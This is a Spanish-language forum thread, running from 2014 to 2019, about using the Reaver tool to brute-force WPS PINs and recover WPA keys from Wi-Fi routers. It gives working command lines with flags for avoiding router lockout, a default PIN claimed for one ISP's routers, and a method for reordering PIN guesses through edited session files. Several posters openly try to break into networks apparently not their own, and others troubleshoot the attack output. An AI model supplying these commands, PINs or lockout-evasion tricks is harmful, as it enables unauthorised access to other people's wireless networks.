Este proyecto pretende ser un proyecto interino del original Reaver-WPS que parece haber sido abandonada.

Con suerte, el proyecto original se convertirá en vivo de nuevo y, si esto sucede, este proyecto será cerrado.

Si toda la información necesaria, como las páginas wiki o la documentación no se encuentra dentro de este proyecto, por favor consulte original: http://code.google.com/p/reaver-wps/ (http://code.google.com/p/reaver-wps/)

INSTALAR:

Yo todavía no he tenido tiempo para preparar y cargar los binarios, pero la versión está lista para descargar e instalar.

Aquí tienes los pasos que usted puede copiar / pegar (ejecutar como root!):

NOTA: Si está ejecutando Ubuntu, asegúrese de que ha instalado libsqlite3-dev: (apt-get install libsqlite3-dev)

Código:
svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-only
cd reaver-wps-fork-read-only/src
./configure
make distclean && ./configure
sudo make
sudo make install


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 3 Junio 2014, 22:18 pm
Hola a todos tengo una jazztel_xxxx con wps activado resulta que se bloquea a los tres intentos de pin que comandos puedo usar para que no se bloquee o para que pase los pin mas lentos no se he probado comandos y nada.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dabr1992 en 16 Junio 2014, 17:50 pm
Buen dia..
he tenido problemas para la instalacion de reaver en KALI. he seguido todos los pasos pero no me permite instalarlo.

cuando trato de compilarlo aparece el error pcap library not found

he intentado instalar la libreria pcap y sqlite-devel con el comando

yum install libpcap-devel libpcap
yum install sqlite-devel

pero aparece: Bash:yum: no se encontro la orden

aunque ejecuto: apt-get install libpcap0.8 y me aparece que ya esta en su version mas reciente y que esta fijado para instalacion manual


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 16 Junio 2014, 23:26 pm
Hola una duda reaver se puede saltar el pin es que voy por el 60% casi y aun no me dio el m6 uso -L y -d 80


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 8 Agosto 2014, 13:43 pm
hola familia!! hacia mucho tiempo que no me pasaba por aquí.
Quería preguntaros, las redes Orange xxxx con wps activado son vulnerables con reaver, lo he intentado y no hay manera. Si no es así en relación a los diccionarios, donde puedo conseguir alguno que reduzca el tiempo, los diccionarios que tengo o he tenido creo que no me sirven.
No se si necesitáis datos sobre dicho router, red, etc...
Saludos !!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: numark24 en 11 Agosto 2014, 20:21 pm
Buen dia..
he tenido problemas para la instalacion de reaver en KALI. he seguido todos los pasos pero no me permite instalarlo.

cuando trato de compilarlo aparece el error pcap library not found

he intentado instalar la libreria pcap y sqlite-devel con el comando

yum install libpcap-devel libpcap
yum install sqlite-devel

pero aparece: Bash:yum: no se encontro la orden

aunque ejecuto: apt-get install libpcap0.8 y me aparece que ya esta en su version mas reciente y que esta fijado para instalacion manual

Reaver ya viene instalado en kali.

En kali se instalan paquetes con..... por ejemplo aptitude install <Paquete>

Suerte!!!! :silbar:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Sopalajo de Arrierez y To en 20 Septiembre 2014, 00:15 am
Buenas:
He leido en varios sitios que el pin para ese router que citas es el  19117652

La linea de comando completa seria esta: reaver -i mon0 -b F8:8E:85:XX:XX:XX -p 19117652 -vv

Para quien esté interesado: Comprobado y correcto auditando otra red de estas. Gracias, NEXUS978.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Lara83 en 29 Septiembre 2014, 16:13 pm
Hola, chicos. A ver si consigo explicar lo que me sucede con Wifiway 3.4
busco una clave WPA de Jazztel
y bien, al llegar el 90,90% completado (dos días casi), se queda repitiendo el trying pin 41645673.
Es la segunda vez que me pasa (buscando la clave de esta misma red)


Alguna sugerencia?
Gracias!

PD: debo dar por hecho que 4164 son los primeros 4 dígitos de la clave que estoy buscando?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 16 Octubre 2014, 03:30 am
Lara83
Citar
Insertar Cita
Hola, chicos. A ver si consigo explicar lo que me sucede con Wifiway 3.4
busco una clave WPA de Jazztel
y bien, al llegar el 90,90% completado (dos días casi), se queda repitiendo el trying pin 41645673.
Es la segunda vez que me pasa (buscando la clave de esta misma red)


Alguna sugerencia?
Gracias!

Sugerencia tira wifiway 3.4 a la basura y descargarte Wifislax 4.9 que es la versión final te ira mejor y tiene nuevos patrones y con mas herramientas. Saludos ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: danisms en 9 Noviembre 2014, 19:48 pm
Buenas tardes.

Viendo que aquí hay mucha gente que ha usado Reaver pongo aquí mi problema, a ver si me pueden echar una mano.


Saludos:

Citar
Actualmente uso Reaver 1.4 en Beini 1.2.5.

Tengo una Alfa Awus036h con chipset RTL8187L. He comprobado que es compatible y he instalado los drivers de la web de Alfa.

Lo que hago es:

1-Inicio Beini
2-Inicio el inflator (reaver)
3-elijo la tarjeta, espero a que me diga que se ha activado el modo monitor y le doy a siguiente.
4-Le doy a buscar pero nada.

A ver si alguien me puede orientar.




PD. Si hay redes con WPS dentro de mi alcance, sería gracioso que estuviera moviendo tierra y mar y que luego el problema fuera que no hubiera redes
PD2. Con feedingbottle si me encuentra redes.

Un saludo y gracias de antemano.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: mardav en 17 Noviembre 2014, 17:29 pm
el inflator solo scanea redes con WPS activo, sino te capta ninguna es porque no las hay. las que capta el feeding bottle deben tener el WPS desactivado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: acavada en 28 Noviembre 2014, 09:31 am
Para quien esté interesado: Comprobado y correcto auditando otra red de estas. Gracias, NEXUS978.

buenas, yo tengo en mi casa un router que cumple con estos datos pero si le intento hacer reaver me sale siempre timeout, y estaba tranquilo, como has hecho para que se saque la clave??..

Por cierto uso wifislax4.9 y he probado el reaver, el 1.3 y el mod (por si acaso) y nada.

gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: EL CHISPA en 14 Diciembre 2014, 15:10 pm
HOLA COMPAÑERO, PODRIAS MANDARME ESE PING , QUE TE DA TAN BUENOS RESULTDOS

GRACIAS DE ANTEMANO


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 29 Diciembre 2014, 19:42 pm
reaver -i mon0 -b mac_router -c x -a -L -r -n --dh-small -vv -d 5

Esta línea de comandos puede apurar el bloqueo del router como 6-7 pines, por lo que si alguno de ellos es válido deja la contraseña de tu router al descubierto. Probado en TP-Link, el famoso router que al parecer ha implementado el firmware probloqueo del Router ante un ataque reaver.  ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: zaratustraelimpio en 19 Enero 2015, 12:15 pm
alguien ha conseguido descifrar algun router de jazztel zte de fibra? con inflator se queda siempre al 99,99% y de ahi no pasa...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: death2005 en 6 Febrero 2015, 16:39 pm
hola a todos ! hacia mucho que no preguntaba nada por aqui

: )

dos preguntillas

el famoso del 99,99% se soluciona con reavermod verdad? pero solo las mac 8C:0C:A3 correcto?, osea si intento descubrir una red jazz q no tiene ese inicio de mac, nunca la podre sacar no hay un  comando para otras macs que pruebe TODAS las combinaciones ?? sin que intente sacar el ultimo dijito con checksum

y la ultima, hace tiempo habia hecho varias auditorias pero al guardarlas, lo ponia en  el  pen drive  en la carpeta de xms  (ahora no recuerdo bien) , crehia q todo estaba ok, cerraba la maquina virtual (por cierto todo lo q he dicho es con virtual box y wifislax 4.10 final pero cuando luego miraba en el pen no habia nada (me pasaba antes con xiaopan y ahora con wifislax) como se hace para guardar la session que este en el pen , que lo pueda comrpobar con windows, y luego recuperar la sesion? otra vez en la maquina virtual?




Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 7 Febrero 2015, 21:07 pm
Citar
el famoso del 99,99% se soluciona con reavermod verdad? pero solo las mac 8C:0C:A3 correcto?, osea si intento descubrir una red jazz q no tiene ese inicio de mac, nunca la podre sacar no hay un  comando para otras macs que pruebe TODAS las combinaciones ?? sin que intente sacar el ultimo dijito con checksum

Si de momento solo con esa Mac es correcto con otras redes que se quede en 99,99 no la sacaras nunca. ;)

Con jazztel dudo que puedas sacar alguna clave con reaver por que tiene el WPS desactivado por defecto que yo sepa.

Citar
y la ultima, hace tiempo habia hecho varias auditorias pero al guardarlas, lo ponia en  el  pen drive  en la carpeta de xms  (ahora no recuerdo bien) , crehia q todo estaba ok, cerraba la maquina virtual (por cierto todo lo q he dicho es con virtual box y wifislax 4.10 final pero cuando luego miraba en el pen no habia nada (me pasaba antes con xiaopan y ahora con wifislax) como se hace para guardar la session que este en el pen , que lo pueda comrpobar con windows, y luego recuperar la sesion? otra vez en la maquina virtual?

A mi botearlo con virtual bot es un royo prefiero botearlo con el unebotin intenta botearlo con el unetbotin haber si puedes guardar lo que tu quieres si no entendido mal.

 zaratustraelimpio
Citar
alguien ha conseguido descifrar algun router de jazztel zte de fibra? con inflator se queda siempre al 99,99% y de ahi no pasa...

No nadie nunca lo sacaras a no ser que te haga un diccionario cosa muy complicada.

Citar
HOLA COMPAÑERO, PODRIAS MANDARME ESE PING , QUE TE DA TAN BUENOS RESULTDOS

GRACIAS DE ANTEMANO

No escribas en Mayúsculas por favor se considera gritar.Gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: death2005 en 8 Febrero 2015, 00:28 am
gracias crack !!

por cierto me salen jazztel con ups e haciendo wash sino ya no lo habria preguntado !

: )

 pero no pude sacar ninguno




Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: death2005 en 10 Febrero 2015, 01:38 am
BUENAS otra vez otra pregunta

cual es el comando equivalente al que usa el pin generator?

la clave que da el pin gen es correcta  ademas al poner probar el pin , la crackea en nada
porque si luego yo pongo en reaver esa misma mac no la saca


reaver -i mon0 b- MAC -p 12345670 -vv

ese es el pin correcto con el que deberia dar la clave...pero no la da, no lo entiendo


un saludo cracks




Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: victoryjem en 28 Abril 2015, 05:03 am
amigos tengo un problema he tratado de hackear un router huawei HG531s V1 mac F4:9F:F3:xx:xx:xx pero no he podido me sale siepmre un error
  • Switching wlan0 to channel 11
  • Waiting for beacon from 74:31:70:18:BC:9A
  • Associated with 74:31:70:18:BC:9A (ESSID: glimglim)
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M1 message
  • Received M1 message
  • Received M1 message
  • Received WSC NACK
  • Sending WSC NACK
  • [!] WPS transaction failed (code: 0x04), re-trying last pin
  • Trying pin 12345670
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M1 message
  • Received M1 message
  • Received M1 message
  • Received WSC NACK
  • Sending WSC NACK

alguien que me pueda ayudar?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Sh4k4 en 28 Abril 2015, 19:43 pm
Citar
amigos tengo un problema he tratado de hackear un router huawei HG531s V1
Que el ataque se detenga... no quieres decir que no sea vulnerable, consejo desactiva el wps.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 4xd34d en 18 Agosto 2015, 19:56 pm
Tengo el mismo problema  ........ se queda intentando un pin y no pasa de alli 

sale este error   :-( WPS transaction failed (code: 0x04), re-trying last pin


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 18 Agosto 2015, 22:26 pm
Tengo el mismo problema  ........ se queda intentando un pin y no pasa de alli 

sale este error   :-( WPS transaction failed (code: 0x04), re-trying last pin

Transacción WPS falló (código: 0x04), vuelva a intentar el última pin, déjalo un rato el ataque se volverá a reanudar o acércate mas al router.

Comienza en "-d 15" o superior hasta que deja de recibir el (código: 0x02) (código: 0x03) errores. Cada router que he probado le gusta un valor diferente.

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lWlan en 26 Junio 2016, 16:15 pm
Alguien sabe como se usa el reaver esque soy nuevo en esto


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Junio 2016, 16:21 pm
Alguien sabe como se usa el reaver esque soy nuevo en esto


Aquí tienes un vídeo de como se usa el Reaver en Wifislax https://www.youtube.com/watch?v=bwITqBZ0q0Y (https://www.youtube.com/watch?v=bwITqBZ0q0Y)

De todas manera por el foro hay vídeo de como se usa esta herramienta y dentro del Wifislax viene tutoriales de como se usa también.

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: lWlan en 26 Junio 2016, 16:25 pm
Lo he intentado con esta red y me sale error
F4:B8:A7:E1:B7


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Junio 2016, 16:40 pm
Lo he intentado con esta red y me sale error
F4:B8:A7:E1:B7

Tienes que especificar un poco mas que tipo de error te salee ? Haz una captura de pantalla y ponla aquí a ver si te podemos ayudar.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Lurker en 26 Junio 2016, 18:42 pm
Citar
F4:B8:A7:E1:B7

Ahí faltan datos......F4:B8:A7:E1:B7:XX



Saludetes.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Junio 2016, 18:49 pm
Lo importante son los 3 primero dígitos los demás da igual pero si dice que te da error no vendría mal poner una captura de pantalla.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: tomasjrl en 20 Septiembre 2016, 20:06 pm
Refloto este tema porque buscando por internet queria mencionarles una opcion que descubri para aplicar con reaver muy interesante, y me parecia mas apropiado hacerlo en el tema "oficial" de reaver, que crear un nuevo tema.


Como saben, reaver hace una comparacion de pines, y siempre comienza con p1 probando del 0000 a 9999 (en realidad con alguna modificacion ya que primero prueba pines por defecto)... y lo mismo hace despues con p2 probando del 000 al 999.

En mi caso me eh pasado reaver semanas hasta encontrar que la combinacion de pines era en base a una combinacion alta (ej: 9620xxxx) :rolleyes: ... lo cual me llevo a preguntarme ¿y si quiero que reaver comience probando desde el numero mayor 9999 al 0000? :huh:


Bueno, reaver no ofrece por defecto esa opcion, pero descubri que eso no significa que no podamos realizarlo!. ::)


A modo de informacion :

Cuando nosotros ejecutamos reaver, comienza la comparacion de pines y guardamos la sesion, se crea un archivo en el directorio /etc/reaver/  que contiene el bssid que estamos ejecutando con extension .wpc (extension con que guarda reaver las sesiones). Ejemplo --> si la bssid es 30:40:12:xx:xx:xx , veremos un archivo con nombre "304012xxxxxx.wpc"

Este archivo se puede abrir con cualquier editor de textos.. y contiene 3 lineas de cabecera y el resto es basicamente el mismo esquema que cualquier diccionario que se crea con crunch (con 4 digitos y 3 digitos).

Dicho esto, podremos crear los diccionarios con crunch a nuestro gusto y luego tendremos 2 opciones:

A) modificar el archivo original (por ej: "304012xxxxxx.wpc"), sobreescribiendo los diccionarios.
B) crear un nuevo archivo donde esten ambos diccionarios generados con crunch agregandole al inicio las 3 lineas de cabecera, y luego llamarlo a este nuevo archivo con la opcion "-s" (+ nombre del archivo) de reaver.


Lo importante es que la estructura que debemos respetar para ambos casos es la siguiente:

0 --> p1 intentos (es donde reaver guardara las sesiones durante p1)
0 --> p2 intentos (es donde reaver guardara las sesiones durante p2)
0 --> binario de comparacion (es negativo hasta hallar el pin de p1/p2 correcto)
xxxx --> diccionario de 4 digitos para p1
xxx   --> diccionario de 3 digitos para p2


Entonces, si queremos que reaver empiece por numeros altos, crearemos los diccionarios con crunch :

crunch 4 4 9876543210 > nombre del archivo1.lst  (para p1)
crunch 3 3 9876543210 > nombre del archivo2.lst  (para p2)


Y luego copiaremos las listas generadas y las pegaremos (A) sobreescribiendo el archivo original o (B) creando un nuevo archivo, agregandole las 3 lineas de cabecera al inicio para que quede con el formato explicado arriba para ser llamada posteriormente con la opcion "-s"  (+ nombre de archivo) de reaver.
 


Y listo, cuando ejecutemos reaver, podremos hacerle probar pines en base al orden que le hayamos dado nosotros! ;-)



pd: Esto es importante porque nos da el control para crear nuestro propios diccionarios para reaver, dando prioridad a lo que nosotros quisieramos (por ejemplo, dejar a lo ultimo determinadas combinaciones, priorizar otras, etc)

:laugh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Killer killer en 12 Enero 2019, 00:22 am
Hola alguien tiene la solución del problema que no pasa de


Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred

Y no pasa de allí


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Guarrino en 14 Enero 2019, 16:31 pm
Hola alguien tiene la solución del problema que no pasa de


Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred
Sending EAPOL START request
WARNING: Receive timeout occurred

Y no pasa de allí

Creo que sí lo hubieras traducido, podrías entenderlo. Busca redes con más señal o vuelve a intentarlo en otro momento si tienes una buena señal.